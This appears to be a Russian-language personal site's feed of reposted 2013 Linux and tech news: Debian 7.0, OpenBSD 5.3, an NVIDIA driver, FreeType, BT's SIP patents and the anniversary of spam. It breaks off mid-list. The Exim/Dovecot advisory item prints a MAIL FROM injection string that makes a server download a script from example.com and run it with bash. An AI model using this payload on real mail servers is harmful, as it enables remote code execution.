Персональный сайт

Тест видео с ютуба

tester — Thu, 16 May 2013 13:00:33 GMT

Test

tester — Tue, 14 May 2013 12:10:34 GMT

ee34a9625f79ec20af16541dab6df5c2

Опасная уязвимость при использовании рекомендуемых в документации настройках связки Exim и Dovecot

tux — Sat, 11 May 2013 10:12:14 GMT

В рекомендованном на wiki-сайте проекта и в некоторых других руководствах примере настройки связки почтового сервера Exim с IMAP/POP3-сервером Dovecot выявлена критическая уязвимость, позволяющая выполнить произвольный код на сервере. Уязвимость может быть эксплуатирована через отправку письма со специальным образом оформленным адресом отправителя. Проблема проявляется только в системах, в которых в конфигурации Exim указана опция use_shell в блоке подключения Dovecot.

Изначально статья с ошибочной опцией была опубликована в 2009 году на официальном сайте проекта Dovecot и ошибка успела перекочевать во многие другие руководства. Всем пользователям связки Exim и Dovecot рекомендуется проверить настройки на предмет отсутствия опции use_shell, при включении которой агент доставки запускается с использованием shell и передачей параметров в командной строке. Метод эксплуатации достаточно прост и сводится к манипуляции с экранированием спецсимволов, позволяя в итоге добиться выполнения shell-команд.
Например, атакующий может указать:

[font color=#461b7e]
MAIL FROM: red`wget${IFS}-O${IFS}/tmp/p${IFS}example.com/test.sh``bash${IFS}/tmp/p`team@example.com
[/font]

В процессе обработки такого запроса exim выполнит

[font color=#461b7e]
/bin/sh -c /usr/lib/Dovecot/deliver -e -k -s -f \red`wget${IFS}-O${IFS}/tmp/p${IFS}example.com/test.sh``bash${IFS}/tmp/p`team@example.com
[/font]

что приведёт к запуску wget, загрузке внешнего скрипта c сайта example.com/test.sh и его запуску.

Источник

Увидел свет Debian 7.0 "Wheezy". Обзор новшеств

tux — Sat, 11 May 2013 10:11:43 GMT

После более чем двух лет разработки увидел свет релиз Debian GNU/Linux 7.0 (Wheezy), доступный для 13 официально поддерживаемых архитектур, среди которых: Intel IA-32 (i386), 64-bit PC / Intel EM64T / x86-64 (amd64), Motorola/IBM PowerPC (powerpc), Sun/Oracle SPARC (sparc), MIPS (mips и mipsel), Intel Itanium (ia64), IBM S/390 (s390, s390x), ARM (armel, armhf). Две архитектуры, s390x и armhf, представлены впервые. Кроме сборок на базе ядра Linux, в число официально поддерживаемых архитектур входит порт на основе ядра FreeBSD - Debian GNU/kFreeBSD (kfreebsd-i386 и kfreebsd-amd64). Изначально планировалось добиться придания официального статуса порту Debian GNU/Hurd, но разработка не была доведена до необходимого уровня.

Debian 7.0 совместим со спецификациями LSB 4.1, определяющими совместимость между приложениями и операционной системой. В репозитории представлено 37493 бинарных и 17500 исходных пакетов, что примерно на 30% больше, чем было представлено в Debian 6.0. По сравнению с Debian 6.0 добавлено 12800 новых бинарных пакетов, удалено 4125 устаревших пакетов, обновлено 20160 пакетов.
Для загрузки доступны CD и DVD-образы, загрузить которые можно по FTP или через системы jigdo и BitTorrent. Полный установочный комплект занимает 69 CD, 10 DVD или 2 Blu-ray диска (плюс 46 CD и 8 DVD с исходными текстами пакетов). Отдельные CD-диски подготовлены для установки окружений GNOME, KDE 4 и LXDE + Xfce. Для желающих осуществить установку по сети создан netinst-образ (150 Мб) и диск в формате бизнес-карты (46Мб). Установочный образ, включающий в себя проприетарные прошивки, можно загрузить здесь. Для архитектур amd64 и i386 разработаны официальные LiveCD/LiveUSB, доступные в вариантах с GNOME, KDE и Xfce. Дополнительно подготовлен многоархитектурный DVD, сочетающий пакеты для платформы amd64 с дополнитеными пакетами для архитектуры i386.

Ключевые улучшения Debian 7.0:

[ul]
[li class=l] Системные изменения
[ul]
[li class=l] Переход на использование по умолчанию файловой системы EXT4;
[/li][li class=l] Обеспечена поддержка установки и загрузки дистрибутива на системах с UEFI. Технология UEFI Secure Boot пока не поддерживается;

[/li][li class=l] Опционально предоставлена возможность использования для инициализации и управления сервисами системного менеджера systemd (для перехода на systemd достаточно выполнить apt-get install systemd). По умолчанию по прежнему задействована система инициализации SysV init, доработанная в плане учёта зависимостей и параллельного запуска сервисов. Кроме того, предоставлена возможность использования системы инициализации upstart;
[/li][li class=l] Уменьшение времени загрузки за счет задействования переработанных скриптов инициализации rc-sysv и активации по умолчанию системы инициализации insserv, учитывающей при загрузке зависимости между init-скриптами и поддерживающей параллельную загрузку скриптов инициализации;
[/li][li class=l]Внедрение новой корневой директории /run, в которую перенесено содержимое /var/run, /var/lock, /dev/shm и /lib/init/rw с целью решения проблемы с недоступностью /var/run на ранней стадии загрузки. Подробное обоснование целесообразности подобного шага можно прочитать здесь;

[/li][/ul]
[/li][li class=l] Поддержка архитектур и платформ
[ul]
[li class=l] Обеспечена поддержка многоархитектурных установок (Multiarch), позволяющих разместить в одной системе исполняемые файлы и библиотеки, параллельно доступные для нескольких аппаратных архитектур, предоставив возможность установки в одну систему нескольких сборок одной программы для разных архитектур, при этом эти сборки программ могут сосуществовать между собой не мешая друг-другу. В частности, включены все необходимые библиотеки для запуска 32-разрядных программ и установки 32-разрядных пакетов штатными средствами в 64-разрядном окружении. Данная возможность позволит пользователям 64-разрядной сборки Debian получить полный доступ ко всем пакетам, доступным для архитектуры i386, в дополнение к пакетам в сборке для amd64. Например, для установки skype и flash можно использовать пакеты из репозитория для архитектуры i386. Необходимость установки 32-разрядного пакета определяется через добавление имени архитектуры после имени пакета, например, sudo apt-get install skype:i386;
[/li][li class=l] Официальная поддержка двух новых архитектур:
[ul]
[li class=l] s390x - 64-разрядный порт для систем IBM System z, нацеленный на замену порта s390;
[/li][li class=l] armhf - альтернативный порт ARMEL для процессоров ARMv7 с интегрированным сопроцессором (FPU Thumb-2 или VFP3D16) для вычислений с плавающей запятой (hard-float). В отличие от ранее поставляемого порта ARM EABI (armel), новый порт позволяет более полно задействовать возможности современных процессоров на базе архитектуры ARMv7 и обеспечить более высокую производительность за счёт задействования аппаратных возможностей CPU для работы с числами с плавающей запятой;
[/li][/ul]
[/li][li class=l] Продолжено развитие порта Debian GNU/kFreeBSD, сочетающего в себе ядро FreeBSD с пользовательским окружением на базе glibc и GNU-утилит. Поддержка варианта дистрибутива на базе ядра FreeBSD предоставляет пользователям возможность использования таких специфичных для FreeBSD средств, как пакетные фильтры PF и IPFW2, изолированные окружения jail, сетевая подсистема NetGraph, возможность загрузки NDIS-драйверов без внешних патчей. В новой версии осуществлён переход на ядро FreeBSD 9.0, в качестве опции предусмотрена возможность использования ядра FreeBSD 8.3. Добавлена полноценная поддержка создания изолированных Jail-окружений и возможность шифрования дисковых разделов с использованием geli.

В инсталлятор Debian GNU/kFreeBSD добавлена поддержка определения разделов LVM и установки на разделы с файловой системой ZFS, в том числе допустимо использование ZFS на корневом разделе. Переработаны средства управления пулом ZFS: добавлена поддержка пулов с несколькими физическими дисками, возможность использования нескольких ФС на одном ZFS-пуле, поддержка обычных ФС на ZFS-разделах (ZVOL), возможность задания произвольных имен для ZFS-пулов, файловых систем и разделов ZVOL. Реализация файловой системы обновлена до версии 28 с поддержкой автоматической дедупликации и RAID-Z;

[/li][/ul]
[/li][li class=l] Безопасность
[ul]
[li class=l] При сборке пакетов для базовой поставки, а также для сетевых приложений из репозиториев, задействованы настройки GCC, обеспечивающие дополнительную защиту от переполнения стека, предсказуемого размещения данных в памяти и других видов атак;
[/li][li class=l] Из коробки обеспечена поддержка системы мандатного контроля доступа AppArmor, которая позволяет контролировать полномочия процессов, определяя списки файлов с соответствующими правами (на чтение, запись, отображение в память и запуск, установку блокировки на файл и т.п.) для каждого приложения. Также AppArmor позволяет на самом общем уровне контролировать доступ к сети (например, запретить использование ICMP) и управлять POSIX capabilities. Основное отличие AppArmor от SELinux состоит в том, что SELinux оперирует ассоциированными с объектом метками, а AppArmor определяет полномочия на основании файлового пути, что заметно упрощает процесс настройки. AppArmor не включен по умолчанию и требует дополнительной активации;
[/li][li class=l] Включение средств для развёртывания облачных систем на собственных локальных мощностях, полностью подконтрольных предприятию. Для упрощения развёртывания собственных облачных инфраструктур в состав дистрибутива включены пакеты, позволяющие с минимальными затратами установить и настроить облачные системы и инфраструктуры виртуализации на базе платформ OpenStack и XCP (Xen Cloud Platform). Обеспечена возможность использования Debian в облачных окружениях Amazon EC2, Windows Azure и Google Computer Engine;
[/li][li class=l] Включение средств для двухфакторной аутентификации с использованием криптографических токенов. Добавлены пакеты liboath0, yubiserver, oathtool, pam_oath с реализацией различных спецификаций OATH;

[/li][/ul]
[/li][li class=l] Улучшения в инсталляторе:
[ul]

[li class=l] Добавлена возможность использования Btrfs для разделов /boot (GRUB 2 и LILO);
[/li][li class=l] Добавлена поддержка организации сетевого соединения через беспроводной канал связи с использованием протоколов WPA и WPA2.
[/li][li class=l] Добавлена поддержка протокола Spanning Tree Protocol (STP);
[/li][li class=l] Внесено большое число улучшений в работу сетевого конфигуратора netcfg.
[/li][li class=l] Добавлена поддержка аутентификации по публичным ключам;
[/li][li class=l] Полная поддержка IPv6 в процессе установки.
[/li][li class=l] Добавлена большая подборка дополнительных драйверов для беспроводных адаптеров, клавиатур и мышей с интерфейсом USB.
[/li][li class=l] Интегрирована поддержка экранного ридера Orca для обеспечения установки дистрибутива людьми с ограниченными возможностями, используя синтез речи для управления процессом инсталляции;
[/li][li class=l] Добавлены необходимые драйверы для установки дистрибутива в качестве гостевой системы, в том числе для запуска в окружении QEMU и Hyper-V.
[/li][li class=l] Улучшена работа инсталлятора на системах с небольшим размером ОЗУ.
[/li][li class=l] Добавлена поддержка установки на бездисковые устройства с использовнием iSCSI и NBD (Network Block Devices).
[/li][li class=l] При установке с USB-накопителя предоставляется возможность выбора ISO-образа, при наличии на установочном носителе нескольких подобных образов;

[/li][/ul]
[/li][li class=l] Управление пакетами и обновление версий программ:
[ul]
[li class=l] В штатные репозитории включены дополнительные кодеки: MP3 (через пакет lame), MPEG-4 ASP (xvidcore), H.264/MPEG-4 AVC (x264), AAC (vo-aacenc), Adaptive Multi-Rate Narrowband (opencore-amr) и Wideband (vo-amrwbenc). Таким образом отныне наиболее востребованные кодеки доступны в штатной поставке и не требуют подключения сторонних репозиториев;
[/li][li class=l] В состав основного пула пакетов добавлен репозиторий backports (squeeze-backports и squeeze-backports-sloppy), в рамках которого обеспечивается формирование пакетов со свежими версиями программ для уже выпущенных релизов дистрибутива Debian. Используя Backports пользователь имеет возможность, например, установить новую версию LibreOffice в Debian Wheezy без ущерба для стабильности системы и без необходимости установки библиотек из testing или unstable. При этом, пакеты с новой версией теперь поставляются бок о бок со штатными версиями пакетов, предлагаемых в дистрибутиве (для установки новых версий программ из бэкпортов по прежнему требуется добавление специального репозитория). В Backports содержится более 500 пакетов, среди которых новые версии ядра Linux, Iceweasel, Icecast, Apache, nginx, Samba, QEMU и т.д.
[/li][li class=l] Обновление версий предлагаемых для установки десктоп окружений: GNOME 3.4, KDE 4.8.4, Xfce 4.8, LXDE. По умолчанию на установочном диске поставляется GNOME;
[/li][li class=l] Для управления пакетами в GNOME осуществлён переход на использование PackageKit. В KDE задействован Apper;

[/li][li class=l] Обновление графического стека: X.Org 7.7, из ядра Linux 3.4 портированы подсистемы drm и agp, что позволило включить более современные графические драйверы intel, nouveau и radeon;
[/li][li class=l] Вместо мультимедиа пакета FFmpeg в дистрибутиве задействован форк проекта - libav;

[/li][li class=l] Переход на использование ядра Linux 3.2 (в Debian 6 использовалось ядро 2.6.32). В состав дистрибутива также включены некоторые драйверы, бэкпортированные из более новых выпусков ядра;
[/li][li class=l] Вместо офисного пакета OpenOffice.org теперь поставляется LibreOffice 3.5.4, а вместо KOffice - Calligra 2.4. Также в поставке доступны GNUmeric 1.10 и Abiword 2.9;
[/li][li class=l] Обновление интернет-приложений: Iceweasel 10 (Firefox), Icedove 10 (Thunderbird), Pidgin 2.10;
[/li][li class=l] Обновление мультимедийных программ: mplayer, mencoder, vlc и transcode, GIMP 2.8.2;
[/li][li class=l] Обновление серверных пакетов: Apache 2.2.22 (+ добавлены модули libapache2-mod-security, libapache2-mod-qos, libapache2-mod-log-slow), BIND 9.8, Courier 0.68, Dovecot 2.1, Exim 4.80, Postfix, 2.9, OpenSSH 6.0p1, Samba 3.6.6, Asterisk 1.8.13.1, OpenJDK 6b27 и 7u3, Xen 4.1.4 ;
[/li][li class=l] Обновление средств для разработчиков: GCC 4.7.2, Glibc 2.13, MySQL 5.5.30, PostgreSQL 9.1, Perl 5.14.2, PHP 5.4.4, Ruby 1.9, Python 2.7.3 и 3.2.3;

[/li][li class=l] Для упрощения создания распределённых вычислительных систем в состав добавлены пакеты с Condor, CCTools и DMTCP;
[/li][li class=l] В состав включены пакеты (linux-image-rt-amd64 и linux-image-rt-686-pae) с вариантом ядра Linux, собранным с патчами PREEMPT_RT для обеспечения работы в режиме реального времени;
[/li][li class=l] В состав включен FUSE-модуль для обеспечения монтирования разделов с файловой системой exFAT;
[/li][li class=l] Исключены из дистрибутива: uw-imapd, ipopd, drupal6, sun-java6, afbackup, php5-suhosin, upsd, opie, plone, xserver-xorg-video-nv, xserver-xorg-video-radeonhd, zabbix. Отдельного упоминания заслуживает прекращение поддержки Linux-Vserver и OpenVZ, вместо которых рекомендовано использовать KVM, LXC или Xen.
[/li][/ul]

[/li][/ul]

Источник

Опасная уязвимость при необдуманном использовании связки Exim и Dovecot

tux — Sat, 11 May 2013 10:11:13 GMT

Сегодня день рождения спама

tux — Sat, 11 May 2013 10:10:42 GMT

Первое спам-сообщение 400 получателям разослала 3 мая 1978 года компания DEC – уже не существующая фирма по изготовлению электронной техники, которая таким образом решила продвинуть на рынок свои новые мини-компьютеры. Объявление было разослано по сети Арпанет (Arpanet), которая была предшественницей современного интернета .

Название «СПАМ» (SPiced hAM) носит марка мясных консервов – пряный колбасный фарш из свинины. После Второй мировой войны, в период, когда на британских островах действовала карточная система, «СПАМ» был одним из немногих мясных продуктов, находившихся в свободной продаже.

Как сообщает «Лаборатория Касперского», по итогам марта текущего года доля спама в общей почтовой рассылке составила 70,1%. Вместе с тем, доля вредоносных вложений в нежелательных сообщениях существенно выросла и достигла показателя в 4%.

Источник

Google и Adobe передали проекту FreeType код нового растеризатора шрифтов

tux — Sat, 11 May 2013 10:10:14 GMT

Компания Google объявила об открытии исходных текстов кардинально улучшенного CFF-растеризатора и его интеграции в состав свободного шрифтового движка FreeType. Разработка выполнена совместно с компанией Adobe и включает альтернативую высококачественную реализацию движков разбора и хинтинга. Новый движок существенно опережает по качеству текущий CFF-растеризатор и заменит его уже в следующем выпуске FreeType.

Формат CFF (Compact Font Format) отличается от TrueType методами описания глифов и хинтов, инструкций по изменению глифа в зависимости от размера. CFF является потомком формата PostScript и позволяет обеспечить более высокое качество на экранах высокой чёткости, но задача по обеспечению качества ложится на растеризатор, а не на шрифт, как в случае с TrueType. Так как разрешение многих экранов ограничено, при отображении текста требуется подобрать оптимальный баланс различных факторов, таких как читаемость текста, отсутствие слишком толстых или тонких символов, соотношение ширины и высоты символов и соответствие оригинальному дизайну гарнитуры. Чем меньше размер отображаемого шрифта, тем труднее подобрать нужный баланс и обеспечить качественное отображение.

Растеризованный новым движком текст значительно более точно соответствует изначальному дизайну гарнитуры шрифта. Улучшения касаются ширины и положения ствола символа, меньшего отсева пикселей, более качественного и однородного отображения сложных сочетаний, например с изображением иероглифов. Для пользователей достоинства нового растеризатора сводятся к более читаемому и красиво выглядящему тексту. Подготовленный новым растеризатором текст выглядит более тёмно, равномерен по высоте, лишён смазываний, выпаданий элементов и излишних утолщений. Текст созданный старым растеризатором выглядит на этом фоне тусклым с неравномерной высотой отдельных символов.

Текст, полученный в результате работы нового растеризатора:

[img src=http://www.opennet.ru/opennew....rder=0]

Результат, полученный при использовании старого растеризатора CFF:

[img src=http://www.opennet.ru/opennew....rder=0]

Результат, полученный при использовании автоматического хинтинга:

[img src=http://www.opennet.ru/opennew....rder=0]

В настоящее время FreeType используется для отображения шрифтов в платформах Android, Chrome OS, Linux, iOS и различных вариантах Unix-систем. Включение нового растеризатора в состав FreeType позволит увеличить качество вывода шрифтов на всех устройствах, базирующихся на данном свободном шрифтовом движке.

Источник

Релиз проприетарного драйвера NVIDIA 319.17 с поддержкой Optimus и RandR 1.4

tux — Sat, 11 May 2013 10:09:47 GMT

Компания NVIDIA представила выпуск 319.17, который ознаменовал перевод ветки проприетарного видеодрайвера NVIDIA 319.x в разряд сертифицированных стабильных выпусков. Драйвер доступен для Linux, FreeBSD и Solaris.

По сравнению с прошлой стабильной веткой в NVIDIA 319.x добавлены следующие новшества:
[ul]

[li class=l] Начальная реализация технологии Optimus для платформы Linux, позволяющей обеспечить работу на ноутбуках со встроенной энергоэффективной видеокартой на базе GPU Intel и дискретной картой NVIDIA. При незначительной нагрузке на графическую подсистему отличающаяся высоким энергопотреблением дискретная карта может быть полностью обесточена, а вывод перенаправлен на более энергоэффективный встроенный GPU Intel, что позволяет значительно продлить время работы портативных устройств в автономном режиме.

В текущем виде драйвер NVIDIA пока не поддерживает все возможности Optimus и позволяет только осуществлять рендегинг на GPU NVIDIA и транслировать вывод через LCD-порт, подключенный к GPU Intel. Пока не поддерживается управление питанием (невозможно обесточить карту NVIDIA), невозможен вынос отдельных операций рендеринга на GPU NVIDIA с использованием GPU Intel для рендеринга рабочего стола, невозможно без запуска отдельного X-сервера организовать горячее перенаправление вывода с порта, подключенного к GPU Intel (LCD-экран ноутбука), на порт, связанный с GPU NVIDIA (внешний монитор). По сути в настоящий момент GPU Intel в связке с проприетарным драйвером NVIDIA ограничен лишь функциями вывода, без возможности экономии энергии за счёт задействования чипа NVIDIA только при необходимости для выполнения рендеринга интенсивно манипулирующих графикой приложений.

Пример настройки конфигурации X-сервера для работы Optimus можно найти на данной странице. Для работы Optimus необходимо наличие X.Org Server 1.13 и ядра Linux 3.9, собранного с опцией CONFIG_DRM, включающей поддержку функций-хелперов gem_prime_* и gem_drm_*. Указанные хелперы внесены в ядро разработчиками NVIDIA и позволяют использовать абстрактный набор простых вызовов, независимых от низкоуровневой реализации поддержки PRIME. Данные вызовы помогли организовать взаимодействие свободных драйверов с проприетарным драйвером NVIDIA без прямого обращения к API DMA-BUF, что позволило избежать нарушения лицензии GPL (стандартные функции DMA-BUF [a [a= href=href= http:= www.opennet.ru= opennews= art.shtml?num=35067 =]отнесены[/url] в ядре Linux к категории внутренних интерфейсов, которые экспортируются в группе EXPORT_SYMBOL_GPL, ограничивающей возможность использования только для модулей ядра, распространяемых под лицензией GPL).

[/li][li class=l] Реализация расширения RandR 1.4, в котором добавлены объекты для выноса на дополнительные GPU операций рендеринга и отображения, что может использоваться для горячего перенаправления вывода на другое устройство или для организации совместной работы нескольких GPU, когда один GPU используется для вывода, а второй для рендеринга сцен (например, вывод осуществляется через USB-адаптер DisplayLink, а рендеринг на GPU NVIDIA). Данная возможность использована для обеспечения работы Optimus и также пока ограничена в своих возможностях;

[/li][li class=l]Поддержка GPU NVIDIA GeForce GTX 650 Ti BOOST, GeForce GT 720M, GeForce GT 735M, GeForce GT 740M, GeForce GT 745M, GeForce GT 750M, GeForce GTX 760M, GeForce GTX 765M, GeForce GTX 770M, GeForce GTX 775M, GeForce GTX 780M;

[/li][li class=l] Поддержка создания инсталлятором заверенных цифровой подписью модулей ядра с компонентами драйвера NVIDIA, которые можно использовать в режиме верифицированной загрузки при использовании UEFI Secure Boot;
[/li][li class=l] В состав включена новая утилита nvidia-modprobe, устанавливаемая с правами setuid root и используемая компонентами драйвера для управления загрузкой модуля ядра и создания необходимого для взаимодействия с ним символьного устройства. По умолчанию по прежнему используются штатные средства дистрибутивов по загрузке модулей и созданию устройств, а утилита позиционируется как запасной вариант при их недоступности;
[/li][li class=l] Реализация режима панорамирования RandR 1.3 и добавление MetaMode-атрибутов PanningTrackingArea и PanningBorder;
[/li][li class=l] Добавление RandR-свойств Border и BorderDimensions для регулировки края области вывода (например, можно задать область вывода меньше фактического размера экрана для компенсации забегания развёртки). Похожие настройки добавлены в конфигуратор nvidia-settings;
[/li][li class=l] Поддержка профилей приложений (Application Profiles) для клиентских компонентов GLX, позволяющих привязать к конкретному пользовательскому приложению или процессу индивидуальный набор настроек;
[/li][li class=l] В панель конфигуратора NVIDIA Settings добавлена страница для настройки параметров VDPAU, позволяющая управлять задействованием различных особенностей GPU по декодированию видео;

[/li][li class=l] Поддержка динамического управления видеорежимами через опции RandR: --newmode, --rmmode и --delmode;

[/li][li class=l] Реализация новых опций для секции Monitor в xorg.conf: Ignore, Enable, Primary и Rotate. Например, опцию Rotate можно применять для автоматического поворота вывода для монитора с заданным идентификатором EDID:
[pre][font color=#461b7e]
Section Monitor
Identifier DPY-EDID-ee6cecc0-fa46-0c33-94e0-274313f9e7eb
Option Rotate left
EndSection
[/font][/pre]

[/li][li class=l] Интерфейс командной строки утилиты nvidia-settings расширен поддержкой указания имён устройств вывода, например: nvidia-settings -q [DVI-I-0]/RefreshRate и nvidia-settings -q [GPU-1.DVI_I-1]/RefreshRate;

[/li][li class=l] Поддержка восстановления EFIFB-консолей на системах UEFI с портами вывода VGA, DVI, HDMI, LVDS или DP;
[/li][li class=l] Добавление дополнительной отладочной информации в OpenGL библиотеки NVIDIA, в том числе информации о содержимом стека;
[/li][li class=l] Увеличена производительность HyperMesh для ряда моделей GPU серии Quadro. Улучшена производительность при отключенной опции Accel;

[/li][li class=l] Включение в состав процесса-демона nvidia-persistenced, предназначенный для организации предварительной загрузки модуля NVIDIA для ядра Linux ещё до запуска компонентов драйвера, работающих на уровне пользователя. Указанная возможность позволяет ускорить запуск компонентов драйвера NVIDIA;
[/li][li class=l] Директория /usr/lib/modprobe.d добавлена в список путей, в которые инсталлятор может опционально установить конфигурационные файлы для modprobe, отключающих драйвер Nouveau.

[/li][li class=l] Устранена большая порция ошибок и недоработок.
[/li][/ul]

Источник

British Telecom начинает собирать патентные отчисления за использование протокола SIP

tux — Sat, 11 May 2013 10:09:17 GMT

Компания British Telecom анонсировала начало программы по сбору лицензионных отчислений с провайдеров, терминирующих VoIP-трафик, и производителей систем на базе протокола SIP. British Telecom владеет 99 патентами так или иначе затрагивающими протокол SIP, которые намерена использовать для сбора отчислений. Ричард Шокли (Richard Shockley), глава организации SIP Forum, продвигающей и развивающей технологии SIP, указал на то, что намерение British Telecom застало индустрию врасплох и вызывает опасение за судьбу бизнеса небольших игроков рынка VoIP-телефонии.

В настоящее время на сайте British Telecom уже опубликовано патентное лицензионное соглашение, которое предлагается подписать тем, кто использует SIP в своём бизнесе. Соглашение предусматривает единовременную выплату 50 тысяч долларов отчислений или 12 тысяч долларов в год. Кроме того, предусмотрен вариант оплаты в виде перечисления 0.3% от дохода, полученного в результате продажи продуктов на базе SIP плюс компенсация за прошлый ущерб в размере 0.3% от продаж SIP-продуктов за последние 6 месяцев. При этом указанные отчисления позиционируются как льготные условия, действующие только при заключении соглашения в течение шести недель после прихода уведомления от юристов British Telecom. Для тех кто не успел вовремя заключить договор будет назначена цена в 60 тысяч долларов или 0.36% от дохода.

Ожидается, что действия British Telecom в первую очередь ударят по небольшим компаниям, у которых нет средств для участия в судебных разбирательствах. Маловероятно, что крупные игроки рынка согласятся сразу выплачивать отчисления British Telecom без предварительных попыток признать патенты недействительными и без выдвижения ответных исков. В частности, British Telecom ещё с 2011 года судится с компанией Google, пытаясь доказать нарушение своих патентов в платформе Android, но пока безрезультатно. Не исключено, что инициатива по сбору отчислений за SIP один из шагов в противостоянии с Google, так как в феврале компания Google попыталась отразить нападки British Telecom патентами на технологии, используемые в шлюзах VoIP.

Источник

Релиз операционной системы OpenBSD 5.3

tux — Sat, 11 May 2013 10:08:46 GMT

Доступен релиз операционной системы OpenBSD 5.3, тридцать четвёртый выпуск за девятнадцатилетнюю историю существования проекта. При развитии OpenBSD основное внимание уделяется переносимости (поддерживается 17 аппаратных архитектур), стандартизации, корректной работе, активной безопасности и интегрированным криптографическим средствам.
Размер установочного iso-образа 220 Мб.

Кроме непосредственно операционной системы, проект OpenBSD известен своими компонентами, которые получили распространение в других системах и зарекомендовали себя как одни из наиболее безопасных и качественных решений. Среди них: OpenSSH, пакетный фильтр PF, демоны маршрутизации OpenBGPD и OpenOSPFD, NTP-сервер OpenNTPD, почтовый сервер OpenSMTPD, мультиплексор текстового терминала (аналог GNU screen) tmux, демон identd с реализацией протокола IDENT, BSDL-альтернатива пакету GNU groff - mandoc, протокол для организации отказоустойчивых систем CARP (Common Address Redundancy Protocol).

Из улучшений, добавленных в OpenBSD 5.3, можно отметить:

[ul]

[li class=l] Для архитектур i386 и amd64 добавлена поддержка процессорных инструкций SMEP (Supervisor Mode Execution Protection) и SMAP (Supervisor Mode Access Prevention), поддерживаемых современными CPU Intel. Использование SMEP не даёт переходить из режима ядра к выполнению кода, находящегося на пользовательском уровне, что позволяет блокировать эксплуатацию многих уязвимостей в ядре (shell-код не будет выполнен, так как он находится в пространстве пользователя). SMAP позволяет блокировать доступ к данным в пространстве пользователя из привилегированного кода, выполняемого в пространстве ядра;

[/li][li class=l] Задействована инструкция RDRAND, через которую предоставлена возможность обращения к аппаратному генератору случайных чисел, появившемуся в новых моделях процессоров Intel (Core i5 и i7);

[/li][li class=l] По умолчанию осуществлён переход на использование PIE (Position-independent executables) для платформ alpha, amd64, hppa, landisk, loongson, sgi и sparc64;

[/li][li class=l] NSCAN задействован в качестве алгоритма по умолчанию для сортировки запросов ввода/вывода, что позволило улучшить справедливость выполнения запросов и сократить время отзыва;
[/li][li class=l] Значительные оптимизации производительности внесены в утилиту make, особенно заметно повышена эффективность сборки с распараллеливанием операций;

[/li][li class=l] В состав базовой системы включён новый демон npppd с реализацией сервера для организации соединений с использованием протоколов L2TP, L2TP/IPsec, PPTP и PPPoE;

[/li][li class=l] В разрабатываемом проектом SNMP-сервере snmpd (OpenSNMP) добавлена поддержка протокола SNMPv3;
[/li][li class=l] Существенно переработана реализация DHCP-клиента (dhclient) от проекта OpenBSD, в котором представлено около 30 изменений и улучшений. В том числе, ускорен процесс конфигурации интерфейсов, добавлена директива ignore, resolv.conf перезаписывается только при изменении маршрута по умолчанию;

[/li][li class=l] Значительная доработка и стабилизация SMTP-сервера OpenSMTPD. OpenSMTPD 5.3 позиционируется как первый стабильный релиз проекта. С особенностями новой версии (от изменения формата конфигурации до поддержки виртуальных доменов и альтернативных баз пользователей) можно познакомиться в данном анонсе;

[/li][li class=l] Улучшение сетевого стека: значительно улучшена совместимость с IPsec v3, в том числе добавлена поддержка расширенных номеров последовательностей в драйвер AES-NI для обеспечения работы режима AES-GCM; в sosplice добавлена поддержка UDP; по умолчанию включен режим автоматической настойки приватности IPv6; в ifconfig hwfeatures теперь выводится максимально поддерживаемый размер MTU для определения поддержки кадров jumbo/baby-jumbo;

[/li][li class=l] В пакетном фильтре PF для сокета divert обеспечена поддержка опции IP_DIVERTFL для выбора типа потока для перенаправления (входящие пакеты, исходящие пакеты или и те и другие); налажена корректная работа с ICMP в трекере состояний соединений sloppy state, не привязывающемся при работе к номеру последовательности (sequence number) и используемом для ассиметричных соединений; добавлен контроль соблюдения лимитов на уровень фрагментации для защиты от ошибок конфигурации, которые могут привести к исчерпанию кластеров mbuf;

[/li][li class=l] В bgpd добавлена поддержка задания фильтров на основе атрибута NEXTHOP; при определении неизвестных параметров сессии теперь выводится предупреждение вместо остановки работы; реализована возможность перезапуска без разрыва сеансов (graceful restart);
[/li][li class=l] В ftp-клиент добавлена поддержка basic-аутентификации HTTP (можно использовать ftp http[s]://user:pass@host/file), реализована возможность рекурсивной загрузки каталога (mput с опцией -r);
[/li][li class=l] В IKEv2-демон iked добавлена поддержка NAT-T;
[/li][li class=l] Добавлен обособленный прокси tftp-proxy, который заменил собой сервис, ранее используемый через inetd;

[/li][li class=l] Обновлён пакет OpenSSH 6.2, обзор улучшений можно посмотреть здесь;

[/li][li class=l] Улучшение поддержки оборудования:
[ul]
[li class=l] Новый драйвер oce для адаптеров Emulex OneConnect 10Gb Ethernet;
[/li][li class=l] Новый драйвер rtsx для картридеров Realtek RTS5209;
[/li][li class=l] Новый драйвер mfii для контроллеров LSI Logic MegaRAID SAS Fusion;
[/li][li class=l] Новый драйвер smsc для Ethernet-адаптеров SMSC LAN95xx с интерфейсом USB;
[/li][li class=l] Новые драйверы для USB-сенсоров Toradex OAK: uoaklux (освещенность), uoakrh (температура и влажность) и uoakv;
[/li][li class=l] В драйвер ahd добавлена поддержка SCSI-карт Adaptec 39320LPE;
[/li][li class=l] В драйвер bge добавлена поддержка Broadcom 5718/5719/5720 Gigabit Ethernet;
[/li][li class=l] В В драйвер iwn добавлена поддержка беспроводных чипов Centrino Advanced-N 6235 и Centrino Wireless-N 1030;
[/li][li class=l] В драйвер ix добавлена поддержка Intel X540 10Gb Ethernet;
[/li][li class=l] В драйвер vr добавлена поддержка миграции TX-прерываний, аппаратной привязки VLAN и аппаратного вычисления контрольных сумм. Ускорение вычисления контрольных сумм также добавлено в драйвер gem;
[/li][li class=l] В драйверы bnx, gem и jme добавлена поддержка контроля потока;
[/li][li class=l] В драйвере mpi появилась поддержка эмулируемых в VMware SAS-контроллеров;
[/li][li class=l] В ulpt добавлена поддержка загрузки прошивки для некоторых принтеров HP LaserJet;
[/li][li class=l] Улучшение поддержки процессоров Loongson. Поддержка throttling (пропуск части циклов для сокращения потребления энергии) для процессоров Loongson 2F;
[/li][/ul]
[/li][li class=l] Число портов превысило 7800. Для архитектуры i386 подготовлено 7670 бинарных пакетов, для amd64 - 7632, для arm - 4944, для mips64el - 56539, для sparc64 - 6756, для hppa - 6401. Из находящихся в портах приложений, отмечены:
[ul]
[li]GNOME 3.6.2 [/li][li]KDE 3.5.10
[/li][li]Xfce 4.10 [/li][li]MySQL 5.1.68
[/li][li]PostgreSQL 9.2.3 [/li][li]Postfix 2.9.6
[/li][li]OpenLDAP 2.3.43 и 2.4.33 [/li][li]Mozilla Firefox 3.6.28 и 18.0.2
[/li][li]Mozilla Thunderbird 17.0.2 [/li][li]GHC 7.4.2
